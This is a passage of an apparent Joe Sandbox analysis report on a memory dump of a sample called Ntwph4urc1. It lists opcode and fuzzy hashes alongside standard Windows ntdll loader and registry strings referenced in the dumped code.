                                            • Instruction Fuzzy Hash: BE315AB5D00219AFDF00DF95DC80AEEBBBCEF44754F904479EA05A7151D7349A04CBA4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                            • API String ID: 0-1050206962
                                            • Opcode ID: 38562abf7a39823f53bf6bb2d0a4274ce631067f25d12c6c669d532797cab5eb
                                            • Instruction ID: deaedd6ad3571434333b20c1c00db2c191b1a260d0ef134b9e665b8167eebf4f
                                            • Opcode Fuzzy Hash: 38562abf7a39823f53bf6bb2d0a4274ce631067f25d12c6c669d532797cab5eb
                                            • Instruction Fuzzy Hash: EC316B72D10219AFEB11CF95CC84EEEBBBDEB84658F420465EA04AB211D739DD048BE1
                                            Strings
                                            • LdrpInitializeTls, xrefs: 369C1A47
                                            • DLL "%wZ" has TLS information at %p, xrefs: 369C1A40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 369C1A51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: 395ae9862c609f8c252a1176ca38fab596393d385fa46d6a34e2ae9162c02cbe
                                            • Instruction ID: 616c268b82487f3a0d1573949de4fb2be2193515e79adcb66fd5cd89acc46a6a
                                            • Opcode Fuzzy Hash: 395ae9862c609f8c252a1176ca38fab596393d385fa46d6a34e2ae9162c02cbe
                                            • Instruction Fuzzy Hash: 8631E271A10302EBF711CB49CC45F6A7BB9AB84354F250169EA45B7290DB70AD46C791
                                            Strings
                                            • @, xrefs: 369912A5
                                            • BuildLabEx, xrefs: 3699130F
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3699127B
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction ID: 860e1505ab44600583bdd7de34526e3dd4b86f6f46cd292254322090913b4649
                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction Fuzzy Hash: 9A318B72900219ABDF11DFA6CC45EEEBBFDEB84764F004025E904AB2A0D730DA05CBA5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: RtlValidateHeap
                                            • API String ID: 3446177414-1797218451
                                            • Opcode ID: 5079134c512e699ca8a0fb6cdefb2b449c8ca7330ffa64c0a6a3366a36bbae56
                                            • Instruction ID: e864bdca674b509f789ed5cbe1868d7114085ceb8434fb740e107f0d94c8ee63
                                            • Opcode Fuzzy Hash: 5079134c512e699ca8a0fb6cdefb2b449c8ca7330ffa64c0a6a3366a36bbae56
                                            • Instruction Fuzzy Hash: 0C412476E003999FEB02DF64CC947BDBBF6BF40254F248259D811AF281CB349905DBA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: kLsE
                                            • API String ID: 3446177414-3058123920
                                            • Opcode ID: e7dd15a14bf9a41f7ef659e6c532d5eefcb17bb6b06d0f8fc11d9c3bba9a06f3
                                            • Instruction ID: 7b4e007476cedee46935606d6029a57030db01aad689a3f9d8ef88a758aabc77
                                            • Opcode Fuzzy Hash: e7dd15a14bf9a41f7ef659e6c532d5eefcb17bb6b06d0f8fc11d9c3bba9a06f3
                                            • Instruction Fuzzy Hash: 8A417871A1134046E712DB28DD88B657BA9EB00765F321128EF50AE2C2CBB74C97C7A2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 832f1df3845af55fa0c56ea7cec7d180887657cdbbd607e782b33fc55add88b9
                                            • Instruction ID: b0682771704e64a9f7055ef6e8b0c09d67ce61a5677b413d05786949f74d6f25
                                            • Opcode Fuzzy Hash: 832f1df3845af55fa0c56ea7cec7d180887657cdbbd607e782b33fc55add88b9
                                            • Instruction Fuzzy Hash: B632A2B49083118BDB24CF16C980B7EB7E5EF847A8F60491EF985972A0E774D854CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: c16b4e95662f3d8890220c9bbfb7de65fb5ddbbc14bdf8dad5e33de01b160ba7
                                            • Instruction ID: a4d2591d3f9ec5259d3718293204bff10222ef95b9b5cd05c565f184bd4c4981
                                            • Opcode Fuzzy Hash: c16b4e95662f3d8890220c9bbfb7de65fb5ddbbc14bdf8dad5e33de01b160ba7
                                            • Instruction Fuzzy Hash: EC31DE35615B12EFEB55CF24CE80A89FBA9FF44358F129025EA0447A52DB70ED21CBD1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$
                                            • API String ID: 3446177414-233714265
                                            • Opcode ID: 382a620d5be5e04ae998bc7ae2ae89cdf5e1d2eafce4e2b09409f86f36b6b111
                                            • Instruction ID: db65fa63b8c3394797cc73331b975e801be016123c3609cea2bc63c4dd332f53
                                            • Opcode Fuzzy Hash: 382a620d5be5e04ae998bc7ae2ae89cdf5e1d2eafce4e2b09409f86f36b6b111
                                            • Instruction Fuzzy Hash: 7361DC71E00749DBEB20CFA6C980BACB7B6FF04328F204069D6156B652DB34AD46CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 8075a19d36eaf66047bad6e2341ff33a99c73a441eaa2a1bb15f06f23353b6f0
                                            • Instruction ID: bbde1d2d117f52860af67f81ce1e18fcd0302f74aba13ca91c3f43acb6e9f5ac
                                            • Opcode Fuzzy Hash: 8075a19d36eaf66047bad6e2341ff33a99c73a441eaa2a1bb15f06f23353b6f0
                                            • Instruction Fuzzy Hash: 2D3100756087819FD302CF3AD855B1AB3E8EF89B54F10286AF940CB391EB30D905CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@
                                            • API String ID: 0-380025441
                                            • Opcode ID: 1486968b6c7058fe3b709889a3069069fe381ecbf5e71edc4be62866780dbb26
                                            • Instruction ID: 12a8917917af03d5e92a9d0f785132494c098910a40b176d4b89f77fe10ca64b
                                            • Opcode Fuzzy Hash: 1486968b6c7058fe3b709889a3069069fe381ecbf5e71edc4be62866780dbb26
                                            • Instruction Fuzzy Hash: 8831B5B55093049FE311CF69C880A5BBBE8FB89698F90092FF99887211DA34DD05CBD3
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 369C2A95
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 369C2A90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: 8ce002f7d5a1bb6e6dfdcc89ecd80e79d905118cc2a5e95e0d5d8072b19a0a86
                                            • Instruction ID: ac091ac979c572e12d0dfb91b51bb1f4a72c14e0f5afe4c55315bf1ab7dfff89
                                            • Opcode Fuzzy Hash: 8ce002f7d5a1bb6e6dfdcc89ecd80e79d905118cc2a5e95e0d5d8072b19a0a86
                                            • Instruction Fuzzy Hash: F6112976B00314BBF725CA998D41F5B77AD9BC8B68F2480697A04EF290D675CD00C6E5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: a54869a98e0e4dbf1972a5a8b65311a107c91920773a799ed47c494aad345eff
                                            • Instruction ID: 3d45dbabcc875dfc0661905f856389757f8297aae738c4d20a82334ba65b1052
                                            • Opcode Fuzzy Hash: a54869a98e0e4dbf1972a5a8b65311a107c91920773a799ed47c494aad345eff
                                            • Instruction Fuzzy Hash: 5FB111B5A083408FD354CF29C980A5AFBE1BF88304F544A6EE999C7352D731E845CB82
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7cae1908a3827adf9aafa56c770f6ee07da79784b24b5fd3d0f8a54fd36e6fc
                                            • Instruction ID: 57264104ff05fb2cb54a4bd012081c299ee9873a252ee3ee90f5b15d5f179321
                                            • Opcode Fuzzy Hash: c7cae1908a3827adf9aafa56c770f6ee07da79784b24b5fd3d0f8a54fd36e6fc
                                            • Instruction Fuzzy Hash: 2FA17075A04341CFE311CF29C884A1ABBEAFF88754F21496DF6859B351DB30EA45CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69b68b91fc021d5154c0e59b6c535979e0916fb449571651b45d566bb1834b14
                                            • Instruction ID: acddaf6fc7f52d5698a1e41985e1dfd358506f3baf9013dda873ca89034bb59b
                                            • Opcode Fuzzy Hash: 69b68b91fc021d5154c0e59b6c535979e0916fb449571651b45d566bb1834b14
                                            • Instruction Fuzzy Hash: 45618175E00605EFEB08CF69C884A9DFBB5FF48244F25816AD619AB301DB30AE51CBD1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 180bd240c417c9f9bb6df0feacc047dc934df4678be0afae83540b2876f94347
                                            • Instruction ID: c4a87deca9f0da84284375d3fed51346b7add4bd99d538e2a6a43e5ebd540541
                                            • Opcode Fuzzy Hash: 180bd240c417c9f9bb6df0feacc047dc934df4678be0afae83540b2876f94347
                                            • Instruction Fuzzy Hash: EA411CB4D01288DFDB11CFAAC880AAEBBF9FB49350F60826ED555A7211D7319945CF60
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: fcefe384468d2bd29dc62219e2432a45f05835788d4238118c8386f249d84988
                                            • Instruction ID: 9b22ac41885bb2736f205f7f0229d68cc61134150f07a0d8b9938e9f42abf9e5
                                            • Opcode Fuzzy Hash: fcefe384468d2bd29dc62219e2432a45f05835788d4238118c8386f249d84988
                                            • Instruction Fuzzy Hash: 3E31F472900304AFD712EF18C840A56B7B9EF453A4F60466AED549F295DB31ED42CBD0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 59f9a971c4d5c2126a753ec0eaa792cc9ae0b19be9011fdc07cc46189b4082ab
                                            • Instruction ID: 934f9e5d96718171cd91831c1f2cfcecdccf44ab28326f4931be2463d85fff40
                                            • Opcode Fuzzy Hash: 59f9a971c4d5c2126a753ec0eaa792cc9ae0b19be9011fdc07cc46189b4082ab
                                            • Instruction Fuzzy Hash: F2319C35A25A05BFEB41CB25CE50A89BBA6FF44254F61A025EA0087B51DB31ED30CBC1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: f967f4cb7864ef563d13950bca6610d31a2e4b07023aab0603dbffdf75bdfff3
                                            • Instruction ID: 9a83efa125c0fd83efd73abc9c44c79d022c0cb9c715582438e10a6697b65d19
                                            • Opcode Fuzzy Hash: f967f4cb7864ef563d13950bca6610d31a2e4b07023aab0603dbffdf75bdfff3
                                            • Instruction Fuzzy Hash: CB21363550A3509FDB22DF05CD44B16BBA8FF88724F62155DEA404B741E674EC04CB82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 4c915a6657788bbd07435f70ffaf5df0ec9f34d155bc641a9dc8397699abfce2
                                            • Instruction ID: 554d1f6d37a5dab7ee22b8df1664114d2b2883c3b70587676ea29d634653dd98
                                            • Opcode Fuzzy Hash: 4c915a6657788bbd07435f70ffaf5df0ec9f34d155bc641a9dc8397699abfce2
                                            • Instruction Fuzzy Hash: CBF0F032108340ABD732EB09CC04F8ABBEDEF85750F180119B54693191C6A1B905C660
                                            Strings
                                            • System Volume Information, xrefs: 369FDEBE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: System Volume Information
                                            • API String ID: 0-764423717
                                            • Opcode ID: 63d8ac069c3901b8f0e6c5146a10c885482acf94d76eee28b4d0db7ea4ba95ec
                                            • Instruction ID: 813e61810a83de08de4f8f79daa3c3466f4b22a7a8ec47ed7458b05a585a6c87
                                            • Opcode Fuzzy Hash: 63d8ac069c3901b8f0e6c5146a10c885482acf94d76eee28b4d0db7ea4ba95ec
                                            • Instruction Fuzzy Hash: E661AC71118315AFD321DF51CC80EABB7E9EF98B94F01082DF9819B2A1D675DD48CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction ID: 2ff20ae91fe7620f1d5e59ceb23ba6b29e523099f4233187ffdebbf92a9658a6
                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction Fuzzy Hash: 73615B75D01259AFEF11CF96C840BEEBBB8EF84754F21412AEA14AB250D7749A00CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction ID: 97014d742b9ec4a8a2e5a94ca14ddb883d9442404b1c5dd0ae01af5e2bfa6ce1
                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction Fuzzy Hash: AE5187B2914705AFE721CF15CC51F6AB7E8FB88794F504939B9809B290DBB4ED04CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                            • Instruction ID: 8699256100886c6f151d58d200822eab0e8ddd2a47b842c431f8cbe2b8013105
                                            • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                            • Instruction Fuzzy Hash: 03519F71505710AFD321CF55C840A6BB7F8FF88B14F00892EF9959B6A0E7B4D904CBA6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            • Opcode ID: 2ef04d6c99b3254692ad0e1a74f266563651bc0ef19895534593d965ffe9420d
                                            • Instruction ID: c113201e38f8d330215c5e082e771aa0118f7e6d802d27e29d106b2f18ec7f43
                                            • Opcode Fuzzy Hash: 2ef04d6c99b3254692ad0e1a74f266563651bc0ef19895534593d965ffe9420d
                                            • Instruction Fuzzy Hash: 2241F176D00219AFDB01CA95DD40BEEB3F9EF48758F210126ED01EB650DA31DE00CBA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: verifier.dll
                                            • API String ID: 0-3265496382
                                            • Opcode ID: f52cfd16e73bc3a08ab93117d7d543da9e33ca908f8ca71e1d06ebffc5a97426
                                            • Instruction ID: 37c50580a528527b3f5203dee74e81f406697d65b494ac80bdda9a7ec0cb7144
